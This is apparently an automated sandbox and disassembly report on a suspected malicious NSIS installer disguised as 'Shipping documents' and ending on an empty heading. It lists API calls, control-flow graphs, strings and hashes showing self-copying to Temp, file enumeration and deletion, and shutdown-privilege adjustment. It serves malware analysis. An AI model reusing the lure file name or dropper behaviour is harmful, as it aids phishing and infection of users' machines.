                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000,00000000), ref: 00403ACA
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000,00000000), ref: 00403ADD
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000,00000000), ref: 00403AEC
                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000,00000000), ref: 00403AFB
                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B23
                                      • DeleteFileW.KERNEL32(0042B538,0042B538,?,00436000,?), ref: 00403B76
                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,0042B538,00000001), ref: 00403B88
                                      • CloseHandle.KERNEL32(00000000,0042B538,0042B538,?,0042B538,00000000), ref: 00403BC1
                                        • Part of subcall function 00405E1E: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00405E26
                                        • Part of subcall function 00405E1E: GetLastError.KERNEL32 ref: 00405E30
                                      • OleUninitialize.OLE32(00000000), ref: 00403BEF
                                      • ExitProcess.KERNEL32 ref: 00403C06
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403C1C
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403C23
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C38
                                      • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C5B
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C80
                                        • Part of subcall function 004065F6: CharNextW.USER32(?,004038BC,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",?,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000), ref: 0040660C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                      • String ID: "C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 1152188737-1333247741
                                      • Opcode ID: b60a00851504de891bfd09832caa0eb08e4525dcbc769ec2cebaef67e08d564f
                                      • Instruction ID: bd20618887128fe8ff831b6fc98b417d690d9367272f1fc6873584cad7b34aa2
                                      • Opcode Fuzzy Hash: b60a00851504de891bfd09832caa0eb08e4525dcbc769ec2cebaef67e08d564f
                                      • Instruction Fuzzy Hash: 00D134B12043116AE7207F659C46B2B3AACAB4474EF41453FF586B62D2D7BC9D40CB2D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 280 404b30-404b47 281 404cd9-404cdf 280->281 282 404b4d-404c1b GetDlgItem * 3 call 405503 call 405835 GetClientRect GetSystemMetrics SendMessageW * 2 280->282 284 404ce1-404d07 GetDlgItem CreateThread CloseHandle 281->284 285 404d25-404d2b 281->285 305 404c31-404c37 282->305 306 404c1d-404c2f SendMessageW * 2 282->306 287 404d0d-404d16 call 40575b 284->287 288 404d56-404d5c 285->288 289 404d2d-404d37 285->289 299 404d1b-404d22 287->299 290 404da4-404da7 288->290 291 404d5e-404d65 288->291 289->287 294 404d39-404d54 ShowWindow * 2 call 405503 289->294 290->287 300 404dad-404db1 290->300 296 404d67-404d71 291->296 297 404d7a-404d8f ShowWindow 291->297 294->287 302 404d73-404d78 call 405958 296->302 303 404da0-404da2 297->303 304 404d91-404d9b call 405d3a 297->304 300->287 307 404db7-404dcf SendMessageW 300->307 302->287 303->302 304->303 310 404c43-404c5c call 40551a 305->310 311 404c39-404c41 SendMessageW 305->311 306->305 312 404ee5-404ee7 307->312 313 404dd5-404e07 CreatePopupMenu call 405eba AppendMenuW 307->313 319 404c90-404cb6 GetDlgItem SendMessageW 310->319 320 404c5e-404c72 ShowWindow 310->320 311->310 312->299 321 404e09-404e19 GetWindowRect 313->321 322 404e1d-404e39 TrackPopupMenu 313->322 319->312 326 404cbc-404cd4 SendMessageW * 2 319->326 323 404c74-404c7d ShowWindow 320->323 324 404c7f 320->324 321->322 322->312 325 404e3f-404e4b 322->325 327 404c85-404c8b call 405503 323->327 324->327 328 404e53-404e6d SendMessageW 325->328 326->312 327->319 328->328 330 404e6f-404e99 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 328->330 331 404e9b-404ec7 SendMessageW 330->331 331->331 332 404ec9-404edf GlobalUnlock SetClipboardData CloseClipboard 331->332 332->312
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 00404B91
                                      • GetDlgItem.USER32(?,000003EE), ref: 00404BA1
                                      • GetClientRect.USER32(00000000,?), ref: 00404BDE
                                      • GetSystemMetrics.USER32(00000002), ref: 00404BE6
                                      • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404C08
                                      • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404C17
                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C25
                                      • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C2F
                                        • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070
                                      • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C41
                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C65
                                      • ShowWindow.USER32(00000000,00000008), ref: 00404C77
                                      • GetDlgItem.USER32(?,000003EC), ref: 00404C99
                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404CAD
                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CC8
                                      • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CD2
                                      • ShowWindow.USER32(00000000), ref: 00404D47
                                      • ShowWindow.USER32(?,00000008), ref: 00404D4C
                                      • GetDlgItem.USER32(?,000003F8), ref: 00404BB1
                                        • Part of subcall function 00405503: SendMessageW.USER32(00000028,?,00000001,00405338), ref: 00405511
                                      • GetDlgItem.USER32(?,000003EC), ref: 00404CF2
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005864,00000000), ref: 00404D00
                                      • CloseHandle.KERNELBASE(00000000), ref: 00404D07
                                      • ShowWindow.USER32(00000008), ref: 00404D82
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404DC1
                                      • CreatePopupMenu.USER32 ref: 00404DD5
                                      • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DF1
                                      • GetWindowRect.USER32(?,?), ref: 00404E0F
                                      • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E31
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E60
                                      • OpenClipboard.USER32(00000000), ref: 00404E70
                                      • EmptyClipboard.USER32 ref: 00404E76
                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E82
                                      • GlobalLock.KERNEL32(00000000), ref: 00404E8F
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EAB
                                      • GlobalUnlock.KERNEL32(?), ref: 00404ECE
                                      • SetClipboardData.USER32(0000000D,?), ref: 00404ED9
                                      • CloseClipboard.USER32 ref: 00404EDF
                                      Strings
                                      • perchlorination: Installing, xrefs: 00404E43
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                      • String ID: perchlorination: Installing
                                      • API String ID: 2901622961-2388396748
                                      • Opcode ID: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
                                      • Instruction ID: b8a9fdf254180bfaf0004a99ba51f40fd9d2112bd445e4f5698f4cfe216f0b8a
                                      • Opcode Fuzzy Hash: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
                                      • Instruction Fuzzy Hash: 45A1BEB1604304BBE720AF61DD89F9B7FA9FFC4754F00092AF645A62E1C7789840CB69

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 828 406719-406742 call 406638 831 406744-406756 DeleteFileW 828->831 832 40675b-406765 828->832 833 4068da-4068e3 831->833 834 406767-406769 832->834 835 406778-40678b call 406b1a 832->835 836 4068c9-4068cf 834->836 837 40676f-406772 834->837 842 40679b-40679c call 406d10 835->842 843 40678d-406799 lstrcatW 835->843 841 4068d9 836->841 837->835 839 406892-40689a call 4065cf 837->839 839->841 850 40689c-4068b0 call 406556 call 406585 839->850 841->833 845 4067a1-4067a6 842->845 843->845 848 4067b2-4067b8 lstrcatW 845->848 849 4067a8-4067b0 845->849 851 4067ba-4067dd lstrlenW FindFirstFileW 848->851 849->848 849->851 864 4068d1-4068d4 call 405d3a 850->864 865 4068b2-4068b4 850->865 854 4067e3-4067e5 851->854 855 40687b-406880 851->855 856 4067e6-4067eb 854->856 855->841 858 406882-406890 855->858 859 406804-406817 call 406b1a 856->859 860 4067ed-4067f3 856->860 858->836 858->839 873 406819-406820 859->873 874 40682b-406834 call 406585 859->874 862 4067f5-4067fa 860->862 863 40685d-40686e FindNextFileW 860->863 862->859 867 4067fc-406802 862->867 863->856 870 406874-406875 FindClose 863->870 864->841 865->836 868 4068b6-4068c7 call 405d3a call 40623d 865->868 867->859 867->863 868->841 870->855 873->863 876 406822-406824 call 406719 873->876 883 406855-406858 call 405d3a 874->883 884 406836-406838 874->884 882 406829 876->882 882->863 883->863 886 40683a-40684b call 405d3a call 40623d 884->886 887 40684d-406853 884->887 886->863 887->863
                                      APIs
                                        • Part of subcall function 00406638: lstrlenW.KERNEL32(004305C0,00000000,004305C0,004305C0,00000000,?,?,0040673B,?,00000000,75923420,?), ref: 0040668C
                                        • Part of subcall function 00406638: GetFileAttributesW.KERNEL32(004305C0,004305C0), ref: 0040669D
                                      • DeleteFileW.KERNELBASE(?,?,00000000,75923420,?), ref: 00406745
                                      • lstrcatW.KERNEL32(0042FDC0,\*.*,0042FDC0,?,00000000,?,00000000,75923420,?), ref: 00406797
                                      • lstrcatW.KERNEL32(?,004092B0,?,0042FDC0,?,00000000,?,00000000,75923420,?), ref: 004067B8
                                      • lstrlenW.KERNEL32(?), ref: 004067BB
                                      • FindFirstFileW.KERNEL32(0042FDC0,?), ref: 004067D2
                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406863
                                      • FindClose.KERNEL32(00000000), ref: 00406875
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                      • String ID: \*.*
                                      • API String ID: 2636146433-1173974218
                                      • Opcode ID: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
                                      • Instruction ID: dccc3e871a12a5ab9d695c44a96518fee9cafe6829caada924bdb8552f231abd
                                      • Opcode Fuzzy Hash: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
                                      • Instruction Fuzzy Hash: 084106322067116AD7207B259C49A6B73A8EF41318F16893FF943F21D1E73C8D6586AF
                                      APIs
                                      • FindFirstFileW.KERNELBASE(00000000,004321C0,00000000,0040667C,004305C0), ref: 004065DA
                                      • FindClose.KERNEL32(00000000), ref: 004065E6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
                                      • Instruction ID: 9bce445b90ad5ff1b83c175b3b927286731ee1a5929a82a3f0dae3cb9bd988e9
                                      • Opcode Fuzzy Hash: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
                                      • Instruction Fuzzy Hash: 64D012756051316BD70057787E0CC8B7F699F05330F158A36B066F11F5D7748C6196AC

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 333 404f92-404fab 334 404fb1-404fb7 333->334 335 405133-405145 333->335 334->335 338 404fbd-404fc0 334->338 336 405147-405187 GetDlgItem * 2 call 40551a SetClassLongW call 401533 335->336 337 40518d-4051a1 335->337 336->337 340 4051a3-4051a5 337->340 341 4051df-4051e4 call 4054e8 337->341 342 404fc2-404fd7 SetWindowPos 338->342 343 404fdc-404fdf 338->343 345 4051d7-4051d9 340->345 346 4051a7-4051b2 call 401399 340->346 357 4051e9-405208 341->357 347 40511f 342->347 349 404fe1-405000 ShowWindow 343->349 350 40502f-405035 343->350 345->341 355 4054aa 345->355 346->345 374 4051b4-4051d2 SendMessageW 346->374 356 405123-40512e call 40575b 347->356 349->356 358 405006-40501c GetWindowLongW 349->358 351 405051-405054 350->351 352 405037-40504c DestroyWindow 350->352 360 405056-405064 SetWindowLongW 351->360 361 405069-40506f 351->361 359 40548e-405495 352->359 363 4054ac-4054b3 355->363 356->363 366 40520a-405215 call 401533 357->366 367 40521b-405221 357->367 358->356 368 405022-40502a ShowWindow 358->368 359->355 370 405497-405499 359->370 360->363 361->347 373 405075-40508f GetDlgItem 361->373 366->367 371 405227-405229 367->371 372 40546a-405483 DestroyWindow EndDialog 367->372 368->356 370->355 377 40549b-4054a4 ShowWindow 370->377 371->372 378 40522f-405286 call 405eba call 40551a * 3 GetDlgItem 371->378 381 405489 372->381 379 405091-4050aa SendMessageW IsWindowEnabled 373->379 380 4050b4-4050b9 373->380 374->363 377->355 409 405294-4052e3 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 378->409 410 405288-405290 378->410 379->355 383 4050b0 379->383 384 4050bb-4050bc 380->384 385 4050be-4050c1 380->385 381->359 383->380 387 4050ff-405104 call 405958 384->387 388 4050d0-4050d3 385->388 389 4050c3-4050ca 385->389 387->356 392 405106-405119 SendMessageW 388->392 394 4050d5-4050dc 388->394 389->392 393 4050cc-4050ce 389->393 392->347 393->387 397 4050ec-4050f5 call 401533 394->397 398 4050de-4050ea call 401533 394->398 397->356 406 4050f7 397->406 405 4050fd 398->405 405->387 406->405 411 4052e5-4052e6 409->411 412 4052e8 409->412 410->409 413 4052e9-405314 GetSystemMenu EnableMenuItem SendMessageW 411->413 412->413 414 405316-40532b SendMessageW 413->414 415 40532d 413->415 416 405333-405379 call 405503 call 405d1b call 406b1a lstrlenW call 405eba SetWindowTextW call 401399 414->416 415->416 416->357 427 40537f-405381 416->427 427->357 428 405387-40538b 427->428 429 4053aa-4053be DestroyWindow 428->429 430 40538d-405393 428->430 429->381 432 4053c4-4053f1 CreateDialogParamW 429->432 430->355 431 405399-40539f 430->431 431->357 433 4053a5 431->433 432->359 434 4053f7-40544e call 40551a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 432->434 433->355 434->355 439 405450-405463 ShowWindow call 4054e8 434->439 441 405468 439->441 441->381
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FD1
                                      • ShowWindow.USER32(?), ref: 00404FFB
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040500C
                                      • ShowWindow.USER32(?,00000004), ref: 00405028
                                      • GetDlgItem.USER32(?,00000001), ref: 0040514F
                                      • GetDlgItem.USER32(?,00000002), ref: 00405159
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00405173
                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004051C1
                                      • GetDlgItem.USER32(?,00000003), ref: 00405270
                                      • ShowWindow.USER32(00000000,?), ref: 00405299
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004052AD
                                      • KiUserCallbackDispatcher.NTDLL(?), ref: 004052C1
                                      • EnableWindow.USER32(?), ref: 004052D9
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052F0
                                      • EnableMenuItem.USER32(00000000), ref: 004052F7
                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405308
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040531F
                                      • lstrlenW.KERNEL32(perchlorination: Installing,?,perchlorination: Installing,00000000), ref: 00405350
                                        • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070
                                      • SetWindowTextW.USER32(?,perchlorination: Installing), ref: 00405368
                                        • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                        • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                      • DestroyWindow.USER32(?,00000000), ref: 004053B0
                                      • CreateDialogParamW.USER32(?,?,-00435A20), ref: 004053E4
                                        • Part of subcall function 0040551A: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405534
                                      • GetDlgItem.USER32(?,000003FA), ref: 0040540D
                                      • GetWindowRect.USER32(00000000), ref: 00405414
                                      • ScreenToClient.USER32(?,?), ref: 00405420
                                      • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405439
                                      • ShowWindow.USER32(00000008,?,00000000), ref: 00405458
                                        • Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA
                                      • ShowWindow.USER32(?,0000000A), ref: 0040549E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                      • String ID: perchlorination: Installing
                                      • API String ID: 162979904-2388396748
                                      • Opcode ID: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
                                      • Instruction ID: ac036152562477463cd4b906f759de02b60d47e3f23a7c23d24dd845f532a47a
                                      • Opcode Fuzzy Hash: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
                                      • Instruction Fuzzy Hash: 39D19071A00A11BFDB206F61ED49A6B7BA8FB84355F00053AF506B62F1C7389851DF9D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 442 405a3e-405a59 call 4068e6 445 405a5b-405a6b call 40661f 442->445 446 405a6d-405aa3 call 406977 442->446 455 405ac6-405aef call 40597f call 406638 445->455 451 405aa5-405ab6 call 406977 446->451 452 405abb-405ac1 lstrcatW 446->452 451->452 452->455 460 405af5-405afa 455->460 461 405b87-405b8f call 406638 455->461 460->461 462 405b00-405b1b call 406977 460->462 467 405b91-405b98 call 405eba 461->467 468 405b9d-405bcb LoadImageW 461->468 466 405b20-405b29 462->466 466->461 469 405b2b-405b31 466->469 467->468 471 405c4a-405c52 call 401533 468->471 472 405bcd-405bf8 RegisterClassW 468->472 473 405b33-405b41 call 4065f6 469->473 474 405b44-405b52 lstrlenW 469->474 483 405d04-405d06 471->483 484 405c58-405c63 call 40597f 471->484 475 405c01-405c45 SystemParametersInfoW CreateWindowExW 472->475 476 405bfa-405bfc 472->476 473->474 480 405b54-405b62 lstrcmpiW 474->480 481 405b7a-405b82 call 406556 call 406b1a 474->481 475->471 482 405d07-405d0e 476->482 480->481 487 405b64-405b6e GetFileAttributesW 480->487 481->461 483->482 495 405c69-405c83 ShowWindow call 40619e 484->495 496 405ceb-405cec call 405864 484->496 490 405b70-405b72 487->490 491 405b74-405b75 call 406d10 487->491 490->481 490->491 491->481 503 405c85-405c8a call 40619e 495->503 504 405c8f-405ca0 GetClassInfoW 495->504 499 405cf1-405cf3 496->499 501 405cf5-405cfb 499->501 502 405d0f-405d11 call 401533 499->502 501->483 505 405cfd-405cff call 401533 501->505 511 405d16 502->511 503->504 508 405ca2-405cb6 GetClassInfoW RegisterClassW 504->508 509 405cb8-405cdb DialogBoxParamW call 401533 504->509 505->483 508->509 513 405ce0-405ce9 call 403cf8 509->513 511->511 513->482
                                      APIs
